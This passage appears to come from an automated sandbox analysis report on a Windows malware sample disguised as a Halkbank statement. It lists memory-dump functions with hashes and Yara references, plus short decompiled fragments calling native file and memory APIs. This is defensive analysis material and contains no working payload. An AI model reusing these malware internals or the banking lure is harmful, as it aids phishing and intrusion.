API ID:
String ID:
API String ID:
Opcode ID: 65e41087b270b87b0e8a66257cc6e5a28893bdd79f5073fd467444b754e464a2
Instruction ID: 6405dadac47726355e26b8f112457e01d01f9f2c83c02db2affb9133b6fa0e68
Opcode Fuzzy Hash: 65e41087b270b87b0e8a66257cc6e5a28893bdd79f5073fd467444b754e464a2
Instruction Fuzzy Hash: CA513434A016048FCB58DB79D854AADBBF2FF88351B54846AE906EB350EB35EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005B9BA2 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a641cda55d7aa27e5f4a44b5f4c3bb1a329917d798f86262b686229585d3551
Instruction ID: 001eb57d57aa448ec4a981dc5e7f3c76034bca9cfad720defa475c37d150db28
Opcode Fuzzy Hash: 9a641cda55d7aa27e5f4a44b5f4c3bb1a329917d798f86262b686229585d3551
Instruction Fuzzy Hash: B2513C74A00209DFDB54DFA5D895BAEBBB2FF84304F108469E60A9B395DF349D81DB40

Uniqueness

Uniqueness Score: -1.00%

Function 005BFE28 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8ec124b92ba4bce164a8971ce01e83d5062f5800946b3efebdef787498fe67
Instruction ID: 61fe931d3f75be0041d1c710d4d2e1af09ffe49aa508e368ad09b985c37b0ebc
Opcode Fuzzy Hash: 4c8ec124b92ba4bce164a8971ce01e83d5062f5800946b3efebdef787498fe67
Instruction Fuzzy Hash: 71418371B002559FDB54DBB488549FFBBFAFBC8210B14443AE506E7A44DB34E9058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 005B51B9 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e33e22100b638963e8b7e17f5806626ea4743b035f0f2a8575dec6cfb75f3e3e
Instruction ID: ab8ca19670e474ba56c3a0483aa7c5bc23f91346e32f3ca973b17fc6299f5798
Opcode Fuzzy Hash: e33e22100b638963e8b7e17f5806626ea4743b035f0f2a8575dec6cfb75f3e3e
Instruction Fuzzy Hash: E8412334A01604CFCB98DBB9C4546ADBBF2FF89351B54846AD806EB350EB31E841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005B6AD8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a27c347f5b41488e55750853a34bd5132060eefc2adedebe4092f16c4221714
Instruction ID: 60653d18be3467c16d35bc6dbce5de04b2e14fa9b0680d61c1f3e134d751a361
Opcode Fuzzy Hash: 4a27c347f5b41488e55750853a34bd5132060eefc2adedebe4092f16c4221714
Instruction Fuzzy Hash: 39419135B002098BDB18DBB4D8656EEBBB6FF88344F148829D505D7291DF35ED09DB90

Uniqueness

Uniqueness Score: -1.00%

Function 005BA134 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3a69338b1c7ec21aa5596179353f4354d7ae701f417c7ad41e446381ce4872
Instruction ID: 27eb46c0453f6183234ab872d74fb94018fa45daabc66efe6e63edf4bea92837
Opcode Fuzzy Hash: bb3a69338b1c7ec21aa5596179353f4354d7ae701f417c7ad41e446381ce4872
Instruction Fuzzy Hash: 0531C834A01245CFCB14DFA4C494AADBBB6FF49305F2488A9D406AB365DB35EC81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 005B4A48 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3a77f2e61fea162a3508e40a78c740404e5dcaf0f065cf0cbd0db02d708aaf
Instruction ID: d3079456acf82cb4133f972ee80431f11ef1e0cdeee0de57f8ae258a07441e7b
Opcode Fuzzy Hash: 0c3a77f2e61fea162a3508e40a78c740404e5dcaf0f065cf0cbd0db02d708aaf
Instruction Fuzzy Hash: DA214C71A00108CFDF14DFA9D854AEEBBB6FB88321F10802AD611A7291CB71AC45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 005B3CE0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce9b6d23d186622eb7acaf505be351fe02d608599e2605867fa96ef43bcb6d4
Instruction ID: 66ee566e487ba9c0cfe138ecb876eb728623ebb714cc94e18c570d995e802659
Opcode Fuzzy Hash: 4ce9b6d23d186622eb7acaf505be351fe02d608599e2605867fa96ef43bcb6d4
Instruction Fuzzy Hash: A6310575A002088FDB14DF64C958AEABBB1FF48321F154169E506EB3A0DB71A940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005B86B8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae51d7a3e34351fc91314d6054da71847ce225a780c566b20e7154f46efaad4
Instruction ID: 6676fc0d1eeead96c71692ec518d3b4a894a191fb694a562239821b547d0f354
Opcode Fuzzy Hash: cae51d7a3e34351fc91314d6054da71847ce225a780c566b20e7154f46efaad4
Instruction Fuzzy Hash: 6621E074A00219CFCB48DFA8C494AADBBF2FF8C310B248569D405A7361DB35AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005B3CD0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a6e84c4b5c40a0e89b8abe45b429c09d876a3f6059691e5982e59dfcdce000
Instruction ID: 0fe34f1434517ebe1f005741fb2c5e96eddc0577764144a015f79527ad9d9a45
Opcode Fuzzy Hash: 60a6e84c4b5c40a0e89b8abe45b429c09d876a3f6059691e5982e59dfcdce000
Instruction Fuzzy Hash: 9E21F834600214CFDB54DF68C958AA9BBF2FF4C720F15456AE506EB3A1DB71AC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005B6680 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9148139370257352693a8718f70cb1f4199249f2f69a7d379cb16f90fa985d
Instruction ID: d2d02b053cff0d0eb159a569b697facd44733d0831fe3f94582756481127718c
Opcode Fuzzy Hash: 8b9148139370257352693a8718f70cb1f4199249f2f69a7d379cb16f90fa985d
Instruction Fuzzy Hash: D9110031A043489FCB01DBB0D8045EEBFF5EF82210F1885EAC899D3251DB34AE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005BFE18 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a661dfa8b4705238a6336ec19ba8698a5aee4609e22c720ab633be4ced3da1
Instruction ID: ca713f3323c9d62fa5b0f6a4dc0112c978c14dfc2935d220fdf0edf39983623c
Opcode Fuzzy Hash: c5a661dfa8b4705238a6336ec19ba8698a5aee4609e22c720ab633be4ced3da1
Instruction Fuzzy Hash: 3B11E9327101555FCB1A9AA8D8548FF7BBEEB89310B00017BE506D7752DE25AD0587E1

Uniqueness

Uniqueness Score: -1.00%

Function 005B528F Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b5fe33460ebc54150e36cd31c47949fb57c06dec93b8f22653c679124bff10
Instruction ID: f701c8baccb3182eba6ed311e35c0e1ddfd28edc827cfd7c396127c13c157908
Opcode Fuzzy Hash: 34b5fe33460ebc54150e36cd31c47949fb57c06dec93b8f22653c679124bff10
Instruction Fuzzy Hash: 43114C34A011148FCB58DBA8D4506EDB7F2FB88351B55846AE915AB350DB71EC01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 005B8670 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa9fed5392f502f644890983e40e64f5c12b965d08ec009a5b47da901e2a8d9
Instruction ID: 7d8586c3943d2a3589cae052c6de4ac311ecfc0701ca9f31a9c02e1de9297eeb
Opcode Fuzzy Hash: 2fa9fed5392f502f644890983e40e64f5c12b965d08ec009a5b47da901e2a8d9
Instruction Fuzzy Hash: 06115A36901109EFCF248F60D5856FCBFB6FF14311B249426E806EA291CF39AD81DB50

Uniqueness

Uniqueness Score: -1.00%

Function 005B81F7 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97c2bc2200b9d00fc205e0503d2f12e04ab52782100f9c04707f64b8c64f8339
Instruction ID: 269c718a8c0967b375ca5305dc8e9d2f6bf76f5de78486230ed42fde0f21bec0
Opcode Fuzzy Hash: 97c2bc2200b9d00fc205e0503d2f12e04ab52782100f9c04707f64b8c64f8339
Instruction Fuzzy Hash: 13010875A0061A9F8B44DFA9D8849EEBBB5FF48300B10856AE915E7350DB74AD11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CFD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809671314.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_cfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f125118a89e8fb70d16a1f51f1aeb882c4410dd29683a2fe9996f95ba93aae
Instruction ID: 50f8389bb289f60dfc94061cdcfc8ffc2ac43077d840bdbbfd4eb44c8a2da5b4
Opcode Fuzzy Hash: 89f125118a89e8fb70d16a1f51f1aeb882c4410dd29683a2fe9996f95ba93aae
Instruction Fuzzy Hash: CF014C6140D7C49FD7128B258C94B62BFB4AF53224F0D81DBE9958F2A3C6695848CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CFD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809671314.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_cfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca576e5ad6e56886a48bdceba546077b48afc0310d1c563a4159628dbedb72be
Instruction ID: 13af32684a59dbc63a54af65ffc0e1107da0f98cb9a516da38de10584a1b3495
Opcode Fuzzy Hash: ca576e5ad6e56886a48bdceba546077b48afc0310d1c563a4159628dbedb72be
Instruction Fuzzy Hash: D3014730404348AEE7508E22CCC4BB7FF98EF41324F18841AEE560B242CB789949D6B2

Uniqueness

Uniqueness Score: -1.00%

Function 005B8EE0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8107e5f3a497f0e49f89c178311209592aeb329430e2745f83edc855546b1a83
Instruction ID: 065fffa08d244dc44271479a266245ecc274ad7c977568a7bf2a3eba888ae8d1
Opcode Fuzzy Hash: 8107e5f3a497f0e49f89c178311209592aeb329430e2745f83edc855546b1a83
Instruction Fuzzy Hash: 2D014F70E046558F8B55DFBDC8048EEBFF9AF89220B1441BAD554EB321E7309802CB95

Uniqueness

Uniqueness Score: -1.00%

Function 005B66C8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f03ca47b1d011bbd05abd9b456f1ff6eaba23df4401862fea9c44a4a16f313
Instruction ID: aa1f66e3c4e07e0cb970b99ac18ef839c0cec5858ee98049e8b59a0d6f15f33c
Opcode Fuzzy Hash: d1f03ca47b1d011bbd05abd9b456f1ff6eaba23df4401862fea9c44a4a16f313
Instruction Fuzzy Hash: D0F0F035A043089FCB159B61D0185EEBBF6EFC6320714886ED4AAD3751CB35BC46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005B8EF0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41b70cbc2e5656263675ae75967bdec121107f7908c423273c18d3da8b1ef88c
Instruction ID: 020e2c8bbef397d0500f7fdd14b962a73141ceffa0503cae79ca18bd0d96e4b7
Opcode Fuzzy Hash: 41b70cbc2e5656263675ae75967bdec121107f7908c423273c18d3da8b1ef88c
Instruction Fuzzy Hash: A1F0B771E101199F8B44DFAEC8009DEBBF9AF88610B50416AD508E7321E77099018BE0

Uniqueness

Uniqueness Score: -1.00%

Function 005B5D58 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f0c82914aa20a233023d45ffdb5103e765855f09fb1ff57441a1e4e0bb5697a
Instruction ID: 861a5f6a408711679a8ab097dd4ace7f742a84f25e8b180fb20dffa6e58984b6
Opcode Fuzzy Hash: 1f0c82914aa20a233023d45ffdb5103e765855f09fb1ff57441a1e4e0bb5697a
Instruction Fuzzy Hash: 24E022356092848FC315C775E8A84AA3F72EECA221308C1BFD49ACB552CA309C06CB21

Uniqueness

Uniqueness Score: -1.00%

Function 005B666F Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.809302975.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dd3deab8824836ea7828fd57afe690c2010e1d50681e1841f8cc9d516b75c31
Instruction ID: ac73e212b8ba1a16131d937fce975c4f262e894db8fc53a9ac5761a28a7b7426
Opcode Fuzzy Hash: 2dd3deab8824836ea7828fd57afe690c2010e1d50681e1841f8cc9d516b75c31
Instruction Fuzzy Hash: 45F06531909388DECF02DFB589412DD7FF59F11211F1846EBC484D61A2E6388B48D751

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Halkbank_Ekstre_20220128_081138_756957 (1).exePID: 2328, Parent PID: 3496COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.6%
Total number of Nodes:	1639
Total number of Limit Nodes:	45

Executed Functions

Function 0041868F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0041868F(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;

				asm("adc [ebp-0x75], edx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t28, _t31); // executed
				return _t18;
			}

0x0041868f
0x00418693
0x0041869f
0x004186a7
0x004186ac
0x004186b2
0x004186cd
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

r=A, xrefs: 004186CD, 004186D4
r=A, xrefs: 004186B2, 004186C0
1:A, xrefs: 004186AC, 004186B8

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: 99b8a50e2168d35742a36bca9dfae57b3cfef3a771d3b4c01223685840aaf415
Instruction ID: a3e8c255eb3348aa9660e31aae895423e97c59b595967c944b8fbc8dbd270095
Opcode Fuzzy Hash: 99b8a50e2168d35742a36bca9dfae57b3cfef3a771d3b4c01223685840aaf415
Instruction Fuzzy Hash: 3DF0F4B2200108AFCB18CF99CC80EEB77A9EF8C354F118249FE0DA7241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418690 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418693
0x0041869f
0x004186a7
0x004186ac
0x004186b2
0x004186cd
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

r=A, xrefs: 004186CD, 004186D4
r=A, xrefs: 004186B2, 004186C0
1:A, xrefs: 004186AC, 004186B8

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004185DA Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 07b7a59a701dc8cabc7dfd3036209cd9647697db0a321a94b2002d03eba610e1
Instruction ID: f145c436d6ca8075c7a3b8bf81194c3b5767f0bb5933c7324d35980acfcb58af
Opcode Fuzzy Hash: 07b7a59a701dc8cabc7dfd3036209cd9647697db0a321a94b2002d03eba610e1
Instruction Fuzzy Hash: 8B01AFB2205208BFCB48CF98DC95EEB77A9AF8C754F158259FA0DD7251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185E0 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C0 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				intOrPtr* _t11;
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				_t11 = E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				 *_t11 =  *_t11 + _t11;
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187cf
0x004187d7
0x004187da
0x004187f9
0x004187fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041870B Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041870B(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				long _t10;
				void* _t16;

				_t7 = _a4;
				_t3 = _t7 + 0x10; // 0x300
				_t4 = _t7 + 0xc50; // 0x409763
				E004191E0(_t16, _a4, _t4,  *_t3, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}

0x00418713
0x00418716
0x0041871f
0x00418727
0x00418735
0x00418739

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d1787907904c231800b2e4640867cb60057ffd5575b3ad4a6fa1a01dc049fc61
Instruction ID: 11eee301871f3300733319cb9128a896eb9b2bdbe263e90bb444f3b2bfc00fb4
Opcode Fuzzy Hash: d1787907904c231800b2e4640867cb60057ffd5575b3ad4a6fa1a01dc049fc61
Instruction Fuzzy Hash: 01E0EC75640210AFE714EFA4CC89EE77B68EF48751F1545AAF9189B252D530E680C690

Uniqueness

Uniqueness Score: -1.00%

Function 0041883A Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041883A(intOrPtr* __eax, void* __esi) {
				long _t10;
				void* _t18;

				 *__eax =  *__eax + __eax;
				_t10 = NtAllocateVirtualMemory( *(_t18 + 0xc),  *(_t18 + 0x10),  *(_t18 + 0x14),  *(_t18 + 0x18),  *(_t18 + 0x1c),  *(_t18 + 0x20)); // executed
				return _t10;
			}

0x004187da
0x004187f9
0x004187fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000011.00000002.935638982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f2867c5313d1b0f677e7cf01ecdd3cdb3ec8ed8e4164a01211bf3dd5a1c4cee0
Instruction ID: 52a9d678520182365850ff6675b7306d941d49de9489ed0784e7f108b9a7ff0a
Opcode Fuzzy Hash: f2867c5313d1b0f677e7cf01ecdd3cdb3ec8ed8e4164a01211bf3dd5a1c4cee0
Instruction Fuzzy Hash: F3E0E2B6204149AFCB04DF98DC90CEBB3A9AF8C304B21864AFD5D83241C635E821CBB1

Uniqueness

Uniqueness Score: -1.00%

